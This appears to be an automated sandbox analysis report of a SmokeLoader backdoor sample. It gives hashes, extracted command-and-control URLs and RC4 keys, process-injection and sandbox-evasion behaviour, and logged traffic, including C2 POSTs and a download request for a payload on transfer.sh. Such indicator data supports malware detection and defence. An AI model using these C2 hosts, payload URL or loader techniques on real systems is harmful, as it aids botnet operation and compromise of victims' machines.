smokeloader | 49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9

Analysis

max time kernel
150s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
08/05/2023, 23:37 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
Size

322KB
MD5

f9b1d55654308e893e49ec62c9ea5aa7
SHA1

dd8604a3ff8e6a7fb284cbb703143311b5072dd8
SHA256

49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9
SHA512

000bc79f49c6bea78d807a3adcb3da0366f1ae35c4e5929046e2b05f176d6eda70f7b88a23d51d0b7781b7d406d8eb9bb35c20ffb6d3b539046bb3fb12bda245
SSDEEP

3072:SPapJc+lYWQGGiZaSptQ5Xem0qGsF0doQZC66YrrMWUfN0c9tVtbCaS0GRPma:Si7OQvpS5XeNBLZC66SYRB99i

Score

10^/10

smokeloader sprg backdoor trojan

Malware Config

Extracted

Family

smokeloader

Botnet

sprg

Extracted

Family

smokeloader

Version

2022

http://hoh0aeghwugh2gie.com/

http://hie7doodohpae4na.com/

http://aek0aicifaloh1yo.com/

http://yic0oosaeiy7ahng.com/

http://wa5zu7sekai8xeih.com/

rc4.i32

1
0x090cd984

rc4.i32

1
0x0d8ab546

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Executes dropped EXE 1 IoCs

pid	Process
2740	rceefar

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rceefar
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rceefar
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rceefar
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4348	49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
4348	49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3180	Process not Found

Suspicious behavior: MapViewOfSection 20 IoCs

pid	Process
4348	49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
3180	Process not Found
2740	rceefar

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3180 wrote to memory of 5020	3180	Process not Found	88
PID 3180 wrote to memory of 5020	3180	Process not Found	88
PID 3180 wrote to memory of 5020	3180	Process not Found	88
PID 3180 wrote to memory of 5020	3180	Process not Found	88
PID 3180 wrote to memory of 5028	3180	Process not Found	89
PID 3180 wrote to memory of 5028	3180	Process not Found	89
PID 3180 wrote to memory of 5028	3180	Process not Found	89
PID 3180 wrote to memory of 2896	3180	Process not Found	91
PID 3180 wrote to memory of 2896	3180	Process not Found	91
PID 3180 wrote to memory of 2896	3180	Process not Found	91
PID 3180 wrote to memory of 2896	3180	Process not Found	91
PID 3180 wrote to memory of 3644	3180	Process not Found	92
PID 3180 wrote to memory of 3644	3180	Process not Found	92
PID 3180 wrote to memory of 3644	3180	Process not Found	92
PID 3180 wrote to memory of 4432	3180	Process not Found	93
PID 3180 wrote to memory of 4432	3180	Process not Found	93
PID 3180 wrote to memory of 4432	3180	Process not Found	93
PID 3180 wrote to memory of 4432	3180	Process not Found	93
PID 3180 wrote to memory of 1876	3180	Process not Found	94
PID 3180 wrote to memory of 1876	3180	Process not Found	94
PID 3180 wrote to memory of 1876	3180	Process not Found	94
PID 3180 wrote to memory of 1876	3180	Process not Found	94
PID 3180 wrote to memory of 1424	3180	Process not Found	95
PID 3180 wrote to memory of 1424	3180	Process not Found	95
PID 3180 wrote to memory of 1424	3180	Process not Found	95
PID 3180 wrote to memory of 1424	3180	Process not Found	95
PID 3180 wrote to memory of 972	3180	Process not Found	96
PID 3180 wrote to memory of 972	3180	Process not Found	96
PID 3180 wrote to memory of 972	3180	Process not Found	96
PID 3180 wrote to memory of 3488	3180	Process not Found	97
PID 3180 wrote to memory of 3488	3180	Process not Found	97
PID 3180 wrote to memory of 3488	3180	Process not Found	97
PID 3180 wrote to memory of 3488	3180	Process not Found	97

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe
"C:\Users\Admin\AppData\Local\Temp\49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4348

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5020

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5028

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2896

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3644

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4432

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1876

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1424

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:972

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3488

C:\Users\Admin\AppData\Roaming\rceefar
C:\Users\Admin\AppData\Roaming\rceefar
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2740

Network

DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
DNS

1.208.79.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.208.79.178.in-addr.arpa

IN PTR

Response

1.208.79.178.in-addr.arpa

IN PTR

https-178-79-208-1amsllnwnet
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

123.108.74.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

123.108.74.40.in-addr.arpa

IN PTR

Response
DNS

hoh0aeghwugh2gie.com

Remote address:

8.8.8.8:53

Request

hoh0aeghwugh2gie.com

IN A

Response

hoh0aeghwugh2gie.com

IN A

193.233.134.86
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ktsqtxbyjo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 142
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qerpykpb.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 177
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gpacxfe.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 190
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 408
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://icftpm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 332
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
DNS

86.134.233.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.134.233.193.in-addr.arpa

IN PTR

Response

86.134.233.193.in-addr.arpa

IN PTR

hosted-bybenderrdp
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yjkmipss.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 359
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kcapn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 332
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ukkkok.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 149
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ecxrwwj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 219
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wpwpmdlxt.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 253
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rcfsxa.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 263
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://spvuv.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 278
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://egslku.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 142
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 408
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yajtmxwxvg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 243
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xiwloeifs.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 263
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 200 OK

Date: Mon, 08 May 2023 23:38:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://abtxwq.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 353
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 408
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qhfsextkoj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 366
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 53
Connection: close
Content-Type: text/html; charset=utf-8
DNS

transfer.sh

Remote address:

8.8.8.8:53

Request

transfer.sh

IN A

Response

transfer.sh

IN A

144.76.136.153
GET

https://transfer.sh/get/wT52CT/bundle.exe

Remote address:

144.76.136.153:443

Request

GET /get/wT52CT/bundle.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: transfer.sh

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Mon, 08 May 2023 23:38:12 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 10
Connection: keep-alive
Retry-After: Tue, 09 May 2023 01:38:17 GMT
X-Content-Type-Options: nosniff
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.51,154.61.71.51
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1683589097
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ceecflqf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 238
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 408
Connection: close
Content-Type: text/html; charset=utf-8
POST

http://hoh0aeghwugh2gie.com/

Remote address:

193.233.134.86:80

Request

POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://elrtayij.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 253
Host: hoh0aeghwugh2gie.com

Response

HTTP/1.1 404 Not Found

Date: Mon, 08 May 2023 23:38:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 408
Connection: close
Content-Type: text/html; charset=utf-8
DNS

153.136.76.144.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.136.76.144.in-addr.arpa

IN PTR

Response

153.136.76.144.in-addr.arpa

IN PTR

transfersh
DNS

2.77.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.77.109.52.in-addr.arpa

IN PTR

Response

193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

4.0kB
169.5kB
77
139

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

720 B
418 B
6
6

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

732 B
755 B
6
4

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

873 B
378 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

902 B
378 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

872 B
378 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

690 B
378 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

761 B
378 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

797 B
378 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

804 B
418 B
6
6

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

818 B
338 B
6
4

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

683 B
795 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

788 B
338 B
6
4

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

807 B
418 B
6
6

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

200
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

894 B
755 B
6
4

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

911 B
399 B
6
4

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
144.76.136.153:443

https://transfer.sh/get/wT52CT/bundle.exe

tls, http

1.1kB
6.0kB
11
15

HTTP Request

GET https://transfer.sh/get/wT52CT/bundle.exe

HTTP Response

404
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

781 B
795 B
6
5

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
193.233.134.86:80

http://hoh0aeghwugh2gie.com/

http

796 B
755 B
6
4

HTTP Request

POST http://hoh0aeghwugh2gie.com/

HTTP Response

404
52.242.101.226:443

260 B
5
20.189.173.2:443

322 B
7
209.197.3.8:80

322 B
7
52.242.101.226:443

260 B
5
13.107.4.50:80

322 B
7
52.242.101.226:443

260 B
5
52.242.101.226:443

260 B
5
52.242.101.226:443

260 B
5
52.242.101.226:443

260 B
5

8.8.8.8:53

154.239.44.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

154.239.44.20.in-addr.arpa
8.8.8.8:53

1.208.79.178.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.208.79.178.in-addr.arpa
8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

123.108.74.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

123.108.74.40.in-addr.arpa
8.8.8.8:53

hoh0aeghwugh2gie.com

dns

66 B
82 B
1
1

DNS Request

hoh0aeghwugh2gie.com

DNS Response

193.233.134.86
8.8.8.8:53

86.134.233.193.in-addr.arpa

dns

73 B
107 B
1
1

DNS Request

86.134.233.193.in-addr.arpa
8.8.8.8:53

transfer.sh

dns

57 B
73 B
1
1

DNS Request

transfer.sh

DNS Response

144.76.136.153
8.8.8.8:53

153.136.76.144.in-addr.arpa

dns

73 B
98 B
1
1

DNS Request

153.136.76.144.in-addr.arpa
8.8.8.8:53

2.77.109.52.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

2.77.109.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\rceefar

Filesize
322KB

MD5
f9b1d55654308e893e49ec62c9ea5aa7

SHA1
dd8604a3ff8e6a7fb284cbb703143311b5072dd8

SHA256
49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9

SHA512
000bc79f49c6bea78d807a3adcb3da0366f1ae35c4e5929046e2b05f176d6eda70f7b88a23d51d0b7781b7d406d8eb9bb35c20ffb6d3b539046bb3fb12bda245

Download Submit
C:\Users\Admin\AppData\Roaming\rceefar

Filesize
322KB

MD5
f9b1d55654308e893e49ec62c9ea5aa7

SHA1
dd8604a3ff8e6a7fb284cbb703143311b5072dd8

SHA256
49fd772c6007383b249067c367f1250415c5e66f76002163ecba38fb4bc6c6f9

SHA512
000bc79f49c6bea78d807a3adcb3da0366f1ae35c4e5929046e2b05f176d6eda70f7b88a23d51d0b7781b7d406d8eb9bb35c20ffb6d3b539046bb3fb12bda245

Download Submit
memory/972-169-0x0000000000D10000-0x0000000000D1D000-memory.dmp

Filesize
52KB

Download
memory/972-177-0x00000000007E0000-0x00000000007EB000-memory.dmp

Filesize
44KB

Download
memory/972-171-0x0000000000D10000-0x0000000000D1D000-memory.dmp

Filesize
52KB

Download
memory/972-170-0x00000000007E0000-0x00000000007EB000-memory.dmp

Filesize
44KB

Download
memory/1424-176-0x0000000000DE0000-0x0000000000DE9000-memory.dmp

Filesize
36KB

Download
memory/1424-168-0x00000000007E0000-0x00000000007EB000-memory.dmp

Filesize
44KB

Download
memory/1424-167-0x00000000007E0000-0x00000000007EB000-memory.dmp

Filesize
44KB

Download
memory/1876-175-0x00000000012A0000-0x00000000012C7000-memory.dmp

Filesize
156KB

Download
memory/1876-164-0x0000000000DE0000-0x0000000000DE9000-memory.dmp

Filesize
36KB

Download
memory/1876-166-0x0000000000DE0000-0x0000000000DE9000-memory.dmp

Filesize
36KB

Download
memory/1876-165-0x00000000012A0000-0x00000000012C7000-memory.dmp

Filesize
156KB

Download
memory/2740-183-0x0000000000400000-0x0000000000804000-memory.dmp

Filesize
4.0MB

Download
memory/2896-155-0x0000000000EC0000-0x0000000000EC9000-memory.dmp

Filesize
36KB

Download
memory/2896-157-0x0000000000EC0000-0x0000000000EC9000-memory.dmp

Filesize
36KB

Download
memory/2896-156-0x00000000001C0000-0x00000000001CF000-memory.dmp

Filesize
60KB

Download
memory/3180-138-0x0000000000B80000-0x0000000000B96000-memory.dmp

Filesize
88KB

Download
memory/3180-182-0x0000000002AC0000-0x0000000002AD6000-memory.dmp

Filesize
88KB

Download
memory/3488-172-0x00000000008F0000-0x00000000008FB000-memory.dmp

Filesize
44KB

Download
memory/3488-173-0x00000000008F0000-0x00000000008FB000-memory.dmp

Filesize
44KB

Download
memory/3488-178-0x0000000000D10000-0x0000000000D1D000-memory.dmp

Filesize
52KB

Download
memory/3644-160-0x0000000000550000-0x000000000055C000-memory.dmp

Filesize
48KB

Download
memory/3644-159-0x0000000000EC0000-0x0000000000EC9000-memory.dmp

Filesize
36KB

Download
memory/3644-158-0x0000000000550000-0x000000000055C000-memory.dmp

Filesize
48KB

Download
memory/4348-137-0x0000000000990000-0x0000000000999000-memory.dmp

Filesize
36KB

Download
memory/4348-139-0x0000000000400000-0x0000000000804000-memory.dmp

Filesize
4.0MB

Download
memory/4432-163-0x00000000012A0000-0x00000000012C7000-memory.dmp

Filesize
156KB

Download
memory/4432-162-0x0000000000550000-0x000000000055C000-memory.dmp

Filesize
48KB

Download
memory/4432-161-0x00000000012A0000-0x00000000012C7000-memory.dmp

Filesize
156KB

Download
memory/5020-151-0x00000000008F0000-0x00000000008FB000-memory.dmp

Filesize
44KB

Download
memory/5020-150-0x0000000000990000-0x0000000000999000-memory.dmp

Filesize
36KB

Download
memory/5020-149-0x00000000008F0000-0x00000000008FB000-memory.dmp

Filesize
44KB

Download
memory/5028-152-0x00000000001C0000-0x00000000001CF000-memory.dmp

Filesize
60KB

Download
